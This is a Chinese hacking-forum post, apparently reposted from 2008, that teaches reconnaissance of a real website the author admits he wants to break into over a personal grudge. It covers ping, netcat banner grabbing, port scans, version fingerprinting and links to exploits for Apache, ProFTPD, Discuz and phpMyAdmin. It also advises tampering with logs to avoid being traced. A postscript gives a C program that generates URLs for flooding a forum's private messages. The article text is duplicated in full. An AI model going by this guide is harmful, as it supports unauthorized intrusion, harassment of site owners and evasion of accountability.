首页
欢迎页
Latest images
搜索
注册
登录较高安全级别主机的渗透 之 序幕篇
较高安全级别主机的渗透 之 序幕篇
由 Admin 周六 四月 19, 2008 12:39 pm
文章作者:冰血封情[EST]
信息来源:中国邪恶八进制(http://www.eviloctal.com/)
几个月前在《黑客X档案》发的文章 为了照顾X的生意 所以现在才发出来....
现在可以下了:)
文章很简单 但是很详细 很适合刚入手 有些技术但是缺少经验的菜鸟阅读....
EST的论坛关闭了所有组成员的上传权限 所以 如果要有图的文章 请到文章最后的连接去下...
前言:这是《网络安全较高安全级别主机的渗透》系列文章中的第一篇,有空继续往下写。
对一台主机的渗透我把他划分了:序幕、渗透、尾声三个阶段。顾名思义,序幕就是入侵前的信息刺探了。
怎么样做到全面和精细,可是很有重要意义的,特别是对后面的渗透起着关键的辅助作用。
很多朋友,甚至包括有些踏入黑界有一段时间的朋友,都是以为信息刺探并不重要。想黑什么主机,抓起工具来找一个IP段一阵狂扫21SerU(北风卷地@#$%^&*) 然后发现溢出漏洞——入侵。
汗!真的让你渗透的时候有那么容易么?
我们不是渗透"漏洞",而是渗透"主机"
成段的扫描某个漏洞,然后谁有洞进谁,等真和你有仇的人来了,你还能扫一段么?
简直是错误思想!冰血封情技术其实不怎么样,和13K、Sagi……他们没法儿比,但是经验还是有那么一点点儿的,就分享一下吧。
今天我们就用一台网络php主机为例子来说明一下网络安全中“踩点”的重要性以及怎么样踩点(小偷的说),咱们选的主机不见得多安全,但是我只是授人与渔。其实踩点往往是最容易忽略的网络渗透的第一步。如果第一步走好,将会为后面的安全检测或者是入侵渗透提供良好的理论指引。
在很多人眼里unix+php是比较安全的。那么我们怎么样为了进入一台php机而搜集前期信息呢?正好最近有一个设计站点得罪了偶妹妹萌萌,那不客气了。正好用它做例子给大家讲讲。话不多说,开始。
透目标(化名):
http://www.target.com/
一、 信息搜集过程:
1、 知道地址
ping http://www.target.com/
Pinging http://www.target.com/ [***.***.***.***] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for ***.***.***.***:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Request timed out.告诉我们什么了呢
以前我在一篇文章中提到过这种情况意味着什么
1对方主机真的不在线,所以没办法回应。
2方主机安装了防火墙,屏蔽了ICMP报文,不反馈echo数据包。
3对方在注册表中进行了安全设置,不回复ICMP报文。
4对方在IPsec中拒绝了ping。
当然,其实意义是一样的,我只是强硬分开来罢了。以上是在对另外一篇文章的推断中写的,当时对方是IIS的机器。
当知道ip后我们就可以进一步的进行信息刺探,有人想用telnet了?呵,还不至于,弄清楚问题再说。
2、 查询地址
ip.hackway.net可以在线查
您的查询结果是:广东省 广州市
相关IP段信息 ***.***.***.*** - ***.***.***.*** 广东省 广州市
现在我们可以知道站点是服务器放在广州的(废话)
很多人觉得查询地址并不重要,这点我就不同意,做为对一个比较重视的安全主机的渗透,是很有必要知道他的地址的,如果出在大城市或者是省会,那么本身的站点的空间商就有可能是比较有后台的,那么渗透中就要把握尺度,避免一失足成千古恨。当然不排除本身这个老板也是个把主机放在N远的地方托管的人。但是多少对我的搜集后期信息会有帮助的。帮助体现在哪?后面我会告诉你的。
3、 下面我们在IP中直接输入
http://***.***.***.***/
回车后访问,弹出一个窗口。
phpMyAdmin running on localhost-1002
的密码输入登录框。图图2取消后页面无法访问。提示:
Welcome to phpMyAdmin 2.5.0-rc2
Wrong username/password. Access denied.
站点上很明显显示站长是北京的。好了,基本可以敲定是托管空间。
这里我们记下一个信息就是:phpMyAdmin 2.5.0-rc2
什么什么?说没看见,要是我徒弟我就给你一掌?一晃而过的信息都要用很敏锐的眼光抓住并且记录下来。其实第一遍搜集资料的时候我也没注意到这个信息(注意我不是只踩一次点的),事实证明我忽略了一个重要的信息,后面就知道了。
4、 开始进一步刺探主机信息
telnet ***.***.***.*** 80回车
在没回显的情况下输入get得到的结果乱七八糟图4。好象有点敏感资料,但是看的不是很清楚。
哈哈,再来,拿出事先准备好的nc(不认识?我不会给你解释的)
nc -vv ***.***.***.*** 80
ip: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [ip] 80 (http) open
get
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
get to / not supported.<P>
Invalid method in request get<P>
<HR>
<ADDRESS>Apache/1.3.29 Server at ***.***.net Port 80</ADDRESS>
</BODY></HTML>
看见上面了么,知道NC的威力了吧,我来来总结一下这里暴露了几个信息。
暴露了Apache/1.3.29这个敏感信息,很轻松确定了对方的系统基本是Unix类的主机。哟哟这个先不着急。但是记住了Apache/1.3.29这个信息(让你记住的都要记住,后面要总结的)。
现在看看这个***.***.net是个什么东西(当然不叫***拉 我修改拉)。输入看看?原来是空间商的服务主页转向到了http://www.***x.cn/。没劲,暂时不管。
旁白:Xuanliang[EST]在一旁凶神恶煞的说 还不用扫描器!
不急。不急:)用扫描器的时候还早哩。
推断:既然是托管?嘿,那就应该是个主机,至少提供ftp啥的。再来:
nc -vv ***.***.***.*** 21
220 ProFTPD 1.2.9rc1 Server (ProFTPD Default Installation) [bj1.***x.cn]
看看这些信息吧ProFTPD 1.2.9rc1 也要记下来。bj1.***x.cn原来是和http://www.***x.cn/ 一样的页面。估计是不同的主机,那就不是我们这次的对象就不管了。
5、 下面我们转向页面信息的搜索
也许有人觉得必要?呵……错了,后面会说为什么那么必要。先去空间商人的服务页看看。
发觉没?目前我们都还没提到过我要黑的那个http://www.target.com/站。这叫发散性信息搜索,就是从周边尽可能的外围搜集主机的情报。可是我独创的词哦(真是欠扁哪.....)
浏览了一下空间商提供服务的web中的bbs。服务商的论坛上竟然还有几个黑道兄弟在发帖?还有我认识的。看来这个商人还知道养几个Hacker来撑门面啊?
这里我们分析出来了一个问题:主机安全管理员可能是比较精细的一个人,至少我如果能进入必须要在日志上多做工夫。避免被追查。
现在终于可以看看那个白痴的页http://www.target.com/
Powered by Discuz! 3.1 ? 2002
看来不是那么简单的问题?Discuz口碑不错,但是现在看来却不那么好,刚暴露漏洞,但是这坛子的板式和服务都怎么看怎么怪。看来要社会工程学了。注册该站点,看见一个mm。泡她,(007的惯用招)。她说那个站是假冒Discuz! 3.1的标识的,因为商业版本没免费的云云。想起偶妹妹也说过,@#$%^&*其实我也没听明白。其实这个站也不大,就是一个论坛,两个美工的版本,然后姑且算它是2.0的免费版。回头如果不对再推翻这个假设。
注意:
在给一些大站踩点的时候他们用的都是自己的服务器,比如:浩方我就玩过(别误会,游戏我可一窍不通)。我都会把他的版权信息,站点地图,公司的联系方式,友情连接……这类在页角上最不容易被发现的重要的信息都看一遍,并做好记录。为什么看这里呢?我们通过一个站点的友情连接就能知道他的站点后台合作伙伴,比如浩方的友情连接里就有上海电信,不用想就是上海的主机最可能了,而且和电信关系非常。
因为我们做任何事情每一步都要慎重,更何况是渗透一些性质特殊的网络主机,国内国外都一样。
大凡企图渗透大型安全性高的站点、中等以上的商业站点、国外政府机关站点、电信相关的站点、国内的顶级安全公司等,如果一失足就进去坐牢了。牢底坐穿的!当然授权安全检测另当别论。
6、 现在非扫描性主机信息刺探就告一段落了
终于开始使用扫描软件做全方位的扫描。看见没?现在才用扫描器,那些不用大脑上来就扫的人哪……我汗。
SuperScan3(用4?不。只是想要端口扫描而已,3就够了。)
X-Scan2.3(这小子真落后!再汗,我这可不是普通的2.3啊。想要?问土豆要)
首先SuperScan3全部完成1-65535。只开了三个端口。扫描信息如下:
+ ***.***.***.***
|___ 21 File Transfer Protocol [Control]
|___ 220 ProFTPD 1.2.9rc1 Server (ProFTPD Default Installation) [bj1.***x.cn]..
|___ 22 SSH Remote Login Protocol
|___ SSH-1.99-OpenSSH_3.5p1 FreeBSD-20030201.
|___ 80 World Wide Web HTTP
|___ HTTP/1.1 302 Found..Date: Mon, 17 May 2004 05:25:25 GMT..Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a mod_watch/3.17 PHP/4.3
从这里看安全级别好象很高。立刻就下结论么?不,什么问题都不要过早定论,我们现在只是搜集信息,还没到收集漏洞和相关资料的阶段呢。
X-Scan2.3上,扫描模块针对unix进行修改(知道前期刺探有用了吧),不要route信息(还记得前面让你找地址是广州的么?大脑里要有张中国的DNS图,记忆不下来自己再去找来多看看),不要port刺探(刚Superscan3扫过,时间是很宝贵的)。
关于扫描器的配置不在我们所谈的话题内,自己研究去,开扫……一会儿。结果出来了,是无任何结果。真的,就是无任何结果(别以为我没选择无条件扫描),呵……很有意思的,感觉到挑战了哦。现在信息搜集部分我们基本完成了。xscan竟然没帮上忙,心理很不舒服。
那么现在我们需要总结一下我们搜集到的信息了(前面我叫大家记下的):
1.Apache/1.3.29
2.ProFTPD 1.2.9rc1
3.Discuz!
4.SSH-1.99-OpenSSH_3.5p1
5.phpMyAdmin 2.5.0-rc2
看看吧,这么少的端口的主机,竟然暴露了5条关键信息(什么什么,太少?大哥这已经很多了。你以为是黑蜂窝煤哪,全是眼儿?),现在您应该问问自己是否有象我这样搜索一个站点的信息,这就是整个过程最关键的,后面搜索资料谁都会。当然这么慎重对一个站点进行分析,前提是比较敏感的站点这里我已经一再强调了。现在我们进入下一个环节。
二、资料搜索过程:
我们使用一些很棒的两个搜索站点进行资料搜索。
第一个就是传说中的世界搜索大王http://www.google.com/
第二个就是我比较喜欢用来搜索国外资料的站点http://www.alltheweb.com/(不知道为什么突然访问不了了)
第三个是安全飞人SQL大哥推荐的国外安全站点http://www.securiteam.com/(真的很棒)
我们在这些站点里,都以以上的总结信息文字+“漏洞”两个字搜索资料,然后变换关键字长度。比如我要搜索phpMyAdmin 2.5.0-rc2的漏洞:
那么我首先输入“phpMyAdmin 2.5.0-rc2 漏洞”搜索到一部分,但是实在太少了。这样我们得减小搜索关键词。修改成“phpMyAdmin 漏洞”搜索到很多很多的资料,然后人工选择我们需要的版本。
这样来来回回几次,我们得到了海量般的漏洞资料、报告、攻击代码和攻击程序。可见这5条信息带给我们的已经是等比数列般增长的信息了。当然这不是一个高安全站点,在所有的站点中充顶算中高级,要是在uinx类的站点里,算是中低级的了,也难关有那么多黑界朋友用他的服务器。
先面我把收集到的信息举例(全部资料已经打包E给X了):
1:80端口上 Apache/1.3.29 存Remote Root安全问题Exploits
http://www.eviloctal.com/forum/show.asp?id=225&bd=30&totable=1
2:21端口上 ProFTPD 1.2.9rc1 存在Remote Root安全问题Exploits
http://www.eviloctal.com/forum/show.asp?id=226&bd=30&totable=1
3:Discuz存在跨站、Cookies、消息未限等安全问题Exploits(说最新的)
http://bbs.gliet.edu.cn/bbs/index.php?showtopic=22550
4:phpMyAdmin 2.5.0-rc2存在密码明文并有可能被直接url读取问题
http://forum.hackway.net/index.php?showtopic=6211
搜集到最全的资料,其实这里就离真正的攻击就只差一步了。至于正式的渗透,我都还没做呢,等考完试有时间再写吧。这个站是我真的想黑的,所以知道内情的兄弟就不要泄露了。
三、最终总结
这样,一次入侵前的踩点就完成了。其实它并不全面,因为各个主机的情况是不同的,也许你还需要到大公司的垃圾堆去翻资料找信息,总之只是一个方面,给大家展示引导一下而已。全文完。
PS:另外说一个问题:
angel那里有一份资料的《Discuz论坛短消息未限制发送次数漏洞》http://www.4ngel.net/showarticle.php?id=15但这分资料有个地方写的不太对,这里指出来一下。问题出在C函数上。文中这一小段:
#include<stdio.h>
main()
{
int i;
for(i=0;i<55933;i++)
{
printf("\nwww.***.com/discuz/pm.php?action=send&pmsubmit=submit&msgto=angel&subject=test&message=test",i);
}
}
小人我是在TC下编译的,有三个错误。
1、main做为主函数少一return;
2、55933可能是vc下的最大值,我没试,但是tc下不行;
3、函数中变量i在printf的格式化中不起作用了;
修改为:
#include<stdio.h>
void main()
{
int i;
for(i=0;i<3000;i++)
{
printf("<a href="http://www.target.com/pm.php?action=send&pmsubmit=submit&msgto=10000&subject=%d&message=ilovecat" target=_blank>www.target.com/pm.php?action=send&pmsubmit=submit&msgto=10000&subject=%d&message=ilovecat</a>",i);
}
}
tc下编译通过了。现在我在该论坛上注册一个叫10000的帐号就可以用它生成Cgi列表刷了。这个是老漏洞了自己看X去复习吧。
欢迎来到我们 邪恶八进制 技术论坛逛逛 地址么....嘿嘿....自己找:)
找不到的话 那你只好去http://www.bbnl.org/灌水了...
文间当中的收集方法.和找利用程序的时候.的思路是一个不错的方法因为国内很少地方公布的.也只有去国外去找了.
信息来源:中国邪恶八进制(http://www.eviloctal.com/)
几个月前在《黑客X档案》发的文章 为了照顾X的生意 所以现在才发出来....
现在可以下了:)
文章很简单 但是很详细 很适合刚入手 有些技术但是缺少经验的菜鸟阅读....
EST的论坛关闭了所有组成员的上传权限 所以 如果要有图的文章 请到文章最后的连接去下...
前言:这是《网络安全较高安全级别主机的渗透》系列文章中的第一篇,有空继续往下写。
对一台主机的渗透我把他划分了:序幕、渗透、尾声三个阶段。顾名思义,序幕就是入侵前的信息刺探了。
怎么样做到全面和精细,可是很有重要意义的,特别是对后面的渗透起着关键的辅助作用。
很多朋友,甚至包括有些踏入黑界有一段时间的朋友,都是以为信息刺探并不重要。想黑什么主机,抓起工具来找一个IP段一阵狂扫21SerU(北风卷地@#$%^&*) 然后发现溢出漏洞——入侵。
汗!真的让你渗透的时候有那么容易么?
我们不是渗透"漏洞",而是渗透"主机"
成段的扫描某个漏洞,然后谁有洞进谁,等真和你有仇的人来了,你还能扫一段么?
简直是错误思想!冰血封情技术其实不怎么样,和13K、Sagi……他们没法儿比,但是经验还是有那么一点点儿的,就分享一下吧。
今天我们就用一台网络php主机为例子来说明一下网络安全中“踩点”的重要性以及怎么样踩点(小偷的说),咱们选的主机不见得多安全,但是我只是授人与渔。其实踩点往往是最容易忽略的网络渗透的第一步。如果第一步走好,将会为后面的安全检测或者是入侵渗透提供良好的理论指引。
在很多人眼里unix+php是比较安全的。那么我们怎么样为了进入一台php机而搜集前期信息呢?正好最近有一个设计站点得罪了偶妹妹萌萌,那不客气了。正好用它做例子给大家讲讲。话不多说,开始。
透目标(化名):
http://www.target.com/
一、 信息搜集过程:
1、 知道地址
ping http://www.target.com/
Pinging http://www.target.com/ [***.***.***.***] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for ***.***.***.***:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Request timed out.告诉我们什么了呢
以前我在一篇文章中提到过这种情况意味着什么
1对方主机真的不在线,所以没办法回应。
2方主机安装了防火墙,屏蔽了ICMP报文,不反馈echo数据包。
3对方在注册表中进行了安全设置,不回复ICMP报文。
4对方在IPsec中拒绝了ping。
当然,其实意义是一样的,我只是强硬分开来罢了。以上是在对另外一篇文章的推断中写的,当时对方是IIS的机器。
当知道ip后我们就可以进一步的进行信息刺探,有人想用telnet了?呵,还不至于,弄清楚问题再说。
2、 查询地址
ip.hackway.net可以在线查
您的查询结果是:广东省 广州市
相关IP段信息 ***.***.***.*** - ***.***.***.*** 广东省 广州市
现在我们可以知道站点是服务器放在广州的(废话)
很多人觉得查询地址并不重要,这点我就不同意,做为对一个比较重视的安全主机的渗透,是很有必要知道他的地址的,如果出在大城市或者是省会,那么本身的站点的空间商就有可能是比较有后台的,那么渗透中就要把握尺度,避免一失足成千古恨。当然不排除本身这个老板也是个把主机放在N远的地方托管的人。但是多少对我的搜集后期信息会有帮助的。帮助体现在哪?后面我会告诉你的。
3、 下面我们在IP中直接输入
http://***.***.***.***/
回车后访问,弹出一个窗口。
phpMyAdmin running on localhost-1002
的密码输入登录框。图图2取消后页面无法访问。提示:
Welcome to phpMyAdmin 2.5.0-rc2
Wrong username/password. Access denied.
站点上很明显显示站长是北京的。好了,基本可以敲定是托管空间。
这里我们记下一个信息就是:phpMyAdmin 2.5.0-rc2
什么什么?说没看见,要是我徒弟我就给你一掌?一晃而过的信息都要用很敏锐的眼光抓住并且记录下来。其实第一遍搜集资料的时候我也没注意到这个信息(注意我不是只踩一次点的),事实证明我忽略了一个重要的信息,后面就知道了。
4、 开始进一步刺探主机信息
telnet ***.***.***.*** 80回车
在没回显的情况下输入get得到的结果乱七八糟图4。好象有点敏感资料,但是看的不是很清楚。
哈哈,再来,拿出事先准备好的nc(不认识?我不会给你解释的)
nc -vv ***.***.***.*** 80
ip: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [ip] 80 (http) open
get
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
get to / not supported.<P>
Invalid method in request get<P>
<HR>
<ADDRESS>Apache/1.3.29 Server at ***.***.net Port 80</ADDRESS>
</BODY></HTML>
看见上面了么,知道NC的威力了吧,我来来总结一下这里暴露了几个信息。
暴露了Apache/1.3.29这个敏感信息,很轻松确定了对方的系统基本是Unix类的主机。哟哟这个先不着急。但是记住了Apache/1.3.29这个信息(让你记住的都要记住,后面要总结的)。
现在看看这个***.***.net是个什么东西(当然不叫***拉 我修改拉)。输入看看?原来是空间商的服务主页转向到了http://www.***x.cn/。没劲,暂时不管。
旁白:Xuanliang[EST]在一旁凶神恶煞的说 还不用扫描器!
不急。不急:)用扫描器的时候还早哩。
推断:既然是托管?嘿,那就应该是个主机,至少提供ftp啥的。再来:
nc -vv ***.***.***.*** 21
220 ProFTPD 1.2.9rc1 Server (ProFTPD Default Installation) [bj1.***x.cn]
看看这些信息吧ProFTPD 1.2.9rc1 也要记下来。bj1.***x.cn原来是和http://www.***x.cn/ 一样的页面。估计是不同的主机,那就不是我们这次的对象就不管了。
5、 下面我们转向页面信息的搜索
也许有人觉得必要?呵……错了,后面会说为什么那么必要。先去空间商人的服务页看看。
发觉没?目前我们都还没提到过我要黑的那个http://www.target.com/站。这叫发散性信息搜索,就是从周边尽可能的外围搜集主机的情报。可是我独创的词哦(真是欠扁哪.....)
浏览了一下空间商提供服务的web中的bbs。服务商的论坛上竟然还有几个黑道兄弟在发帖?还有我认识的。看来这个商人还知道养几个Hacker来撑门面啊?
这里我们分析出来了一个问题:主机安全管理员可能是比较精细的一个人,至少我如果能进入必须要在日志上多做工夫。避免被追查。
现在终于可以看看那个白痴的页http://www.target.com/
Powered by Discuz! 3.1 ? 2002
看来不是那么简单的问题?Discuz口碑不错,但是现在看来却不那么好,刚暴露漏洞,但是这坛子的板式和服务都怎么看怎么怪。看来要社会工程学了。注册该站点,看见一个mm。泡她,(007的惯用招)。她说那个站是假冒Discuz! 3.1的标识的,因为商业版本没免费的云云。想起偶妹妹也说过,@#$%^&*其实我也没听明白。其实这个站也不大,就是一个论坛,两个美工的版本,然后姑且算它是2.0的免费版。回头如果不对再推翻这个假设。
注意:
在给一些大站踩点的时候他们用的都是自己的服务器,比如:浩方我就玩过(别误会,游戏我可一窍不通)。我都会把他的版权信息,站点地图,公司的联系方式,友情连接……这类在页角上最不容易被发现的重要的信息都看一遍,并做好记录。为什么看这里呢?我们通过一个站点的友情连接就能知道他的站点后台合作伙伴,比如浩方的友情连接里就有上海电信,不用想就是上海的主机最可能了,而且和电信关系非常。
因为我们做任何事情每一步都要慎重,更何况是渗透一些性质特殊的网络主机,国内国外都一样。
大凡企图渗透大型安全性高的站点、中等以上的商业站点、国外政府机关站点、电信相关的站点、国内的顶级安全公司等,如果一失足就进去坐牢了。牢底坐穿的!当然授权安全检测另当别论。
6、 现在非扫描性主机信息刺探就告一段落了
终于开始使用扫描软件做全方位的扫描。看见没?现在才用扫描器,那些不用大脑上来就扫的人哪……我汗。
SuperScan3(用4?不。只是想要端口扫描而已,3就够了。)
X-Scan2.3(这小子真落后!再汗,我这可不是普通的2.3啊。想要?问土豆要)
首先SuperScan3全部完成1-65535。只开了三个端口。扫描信息如下:
+ ***.***.***.***
|___ 21 File Transfer Protocol [Control]
|___ 220 ProFTPD 1.2.9rc1 Server (ProFTPD Default Installation) [bj1.***x.cn]..
|___ 22 SSH Remote Login Protocol
|___ SSH-1.99-OpenSSH_3.5p1 FreeBSD-20030201.
|___ 80 World Wide Web HTTP
|___ HTTP/1.1 302 Found..Date: Mon, 17 May 2004 05:25:25 GMT..Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a mod_watch/3.17 PHP/4.3
从这里看安全级别好象很高。立刻就下结论么?不,什么问题都不要过早定论,我们现在只是搜集信息,还没到收集漏洞和相关资料的阶段呢。
X-Scan2.3上,扫描模块针对unix进行修改(知道前期刺探有用了吧),不要route信息(还记得前面让你找地址是广州的么?大脑里要有张中国的DNS图,记忆不下来自己再去找来多看看),不要port刺探(刚Superscan3扫过,时间是很宝贵的)。
关于扫描器的配置不在我们所谈的话题内,自己研究去,开扫……一会儿。结果出来了,是无任何结果。真的,就是无任何结果(别以为我没选择无条件扫描),呵……很有意思的,感觉到挑战了哦。现在信息搜集部分我们基本完成了。xscan竟然没帮上忙,心理很不舒服。
那么现在我们需要总结一下我们搜集到的信息了(前面我叫大家记下的):
1.Apache/1.3.29
2.ProFTPD 1.2.9rc1
3.Discuz!
4.SSH-1.99-OpenSSH_3.5p1
5.phpMyAdmin 2.5.0-rc2
看看吧,这么少的端口的主机,竟然暴露了5条关键信息(什么什么,太少?大哥这已经很多了。你以为是黑蜂窝煤哪,全是眼儿?),现在您应该问问自己是否有象我这样搜索一个站点的信息,这就是整个过程最关键的,后面搜索资料谁都会。当然这么慎重对一个站点进行分析,前提是比较敏感的站点这里我已经一再强调了。现在我们进入下一个环节。
二、资料搜索过程:
我们使用一些很棒的两个搜索站点进行资料搜索。
第一个就是传说中的世界搜索大王http://www.google.com/
第二个就是我比较喜欢用来搜索国外资料的站点http://www.alltheweb.com/(不知道为什么突然访问不了了)
第三个是安全飞人SQL大哥推荐的国外安全站点http://www.securiteam.com/(真的很棒)
我们在这些站点里,都以以上的总结信息文字+“漏洞”两个字搜索资料,然后变换关键字长度。比如我要搜索phpMyAdmin 2.5.0-rc2的漏洞:
那么我首先输入“phpMyAdmin 2.5.0-rc2 漏洞”搜索到一部分,但是实在太少了。这样我们得减小搜索关键词。修改成“phpMyAdmin 漏洞”搜索到很多很多的资料,然后人工选择我们需要的版本。
这样来来回回几次,我们得到了海量般的漏洞资料、报告、攻击代码和攻击程序。可见这5条信息带给我们的已经是等比数列般增长的信息了。当然这不是一个高安全站点,在所有的站点中充顶算中高级,要是在uinx类的站点里,算是中低级的了,也难关有那么多黑界朋友用他的服务器。
先面我把收集到的信息举例(全部资料已经打包E给X了):
1:80端口上 Apache/1.3.29 存Remote Root安全问题Exploits
http://www.eviloctal.com/forum/show.asp?id=225&bd=30&totable=1
2:21端口上 ProFTPD 1.2.9rc1 存在Remote Root安全问题Exploits
http://www.eviloctal.com/forum/show.asp?id=226&bd=30&totable=1
3:Discuz存在跨站、Cookies、消息未限等安全问题Exploits(说最新的)
http://bbs.gliet.edu.cn/bbs/index.php?showtopic=22550
4:phpMyAdmin 2.5.0-rc2存在密码明文并有可能被直接url读取问题
http://forum.hackway.net/index.php?showtopic=6211
搜集到最全的资料,其实这里就离真正的攻击就只差一步了。至于正式的渗透,我都还没做呢,等考完试有时间再写吧。这个站是我真的想黑的,所以知道内情的兄弟就不要泄露了。
三、最终总结
这样,一次入侵前的踩点就完成了。其实它并不全面,因为各个主机的情况是不同的,也许你还需要到大公司的垃圾堆去翻资料找信息,总之只是一个方面,给大家展示引导一下而已。全文完。
PS:另外说一个问题:
angel那里有一份资料的《Discuz论坛短消息未限制发送次数漏洞》http://www.4ngel.net/showarticle.php?id=15但这分资料有个地方写的不太对,这里指出来一下。问题出在C函数上。文中这一小段:
#include<stdio.h>
main()
{
int i;
for(i=0;i<55933;i++)
{
printf("\nwww.***.com/discuz/pm.php?action=send&pmsubmit=submit&msgto=angel&subject=test&message=test",i);
}
}
小人我是在TC下编译的,有三个错误。
1、main做为主函数少一return;
2、55933可能是vc下的最大值,我没试,但是tc下不行;
3、函数中变量i在printf的格式化中不起作用了;
修改为:
#include<stdio.h>
void main()
{
int i;
for(i=0;i<3000;i++)
{
printf("<a href="http://www.target.com/pm.php?action=send&pmsubmit=submit&msgto=10000&subject=%d&message=ilovecat" target=_blank>www.target.com/pm.php?action=send&pmsubmit=submit&msgto=10000&subject=%d&message=ilovecat</a>",i);
}
}
tc下编译通过了。现在我在该论坛上注册一个叫10000的帐号就可以用它生成Cgi列表刷了。这个是老漏洞了自己看X去复习吧。
欢迎来到我们 邪恶八进制 技术论坛逛逛 地址么....嘿嘿....自己找:)
找不到的话 那你只好去http://www.bbnl.org/灌水了...
文间当中的收集方法.和找利用程序的时候.的思路是一个不错的方法因为国内很少地方公布的.也只有去国外去找了.
Admin- Admin
- 帖子数 : 144
年龄 : 35
注册日期 : 08-03-09 -
您在这个论坛的权限:
您不能在这个论坛回复主题